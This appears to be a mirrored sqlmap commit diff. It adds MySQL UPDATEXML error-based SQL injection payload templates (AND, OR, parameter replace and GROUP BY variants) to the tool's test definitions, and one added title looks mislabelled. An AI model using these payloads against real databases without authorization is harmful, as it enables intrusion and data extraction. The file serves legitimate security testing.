mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-07-23 22:49:50 +03:00
added MySQL updatexml error-based payload
This commit is contained in:
Miroslav Stampar
parent
2033a28ae7
commit
ca83305b58
|
|
@ -1010,7 +1010,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause</title>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>0</risk>
|
||||
|
|
@ -1029,6 +1029,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 4.1 AND error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
|
|
@ -1208,7 +1228,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause</title>
|
||||
<title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
|
|
@ -1227,6 +1247,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1</clause>
|
||||
<where>1</where>
|
||||
<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause</title>
|
||||
<stype>2</stype>
|
||||
|
|
@ -1433,7 +1473,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 - Parameter replace</title>
|
||||
<title>MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
|
|
@ -1452,6 +1492,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<where>3</where>
|
||||
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
|
||||
<request>
|
||||
<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL error-based - Parameter replace</title>
|
||||
<stype>2</stype>
|
||||
|
|
@ -1554,7 +1614,7 @@ Formats:
|
|||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses</title>
|
||||
<title>MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)</title>
|
||||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>0</risk>
|
||||
|
|
@ -1573,6 +1633,26 @@ Formats:
|
|||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)</title>
|
||||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>0</risk>
|
||||
<clause>2,3</clause>
|
||||
<where>1</where>
|
||||
<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>
|
||||
<request>
|
||||
<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>
|
||||
</request>
|
||||
<response>
|
||||
<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>
|
||||
</response>
|
||||
<details>
|
||||
<dbms>MySQL</dbms>
|
||||
<dbms_version>>= 5.1</dbms_version>
|
||||
</details>
|
||||
</test>
|
||||
|
||||
<test>
|
||||
<title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
|
||||
<stype>2</stype>
|
||||
|
|
|
|||
Loading…
Reference in New Issue
Block a user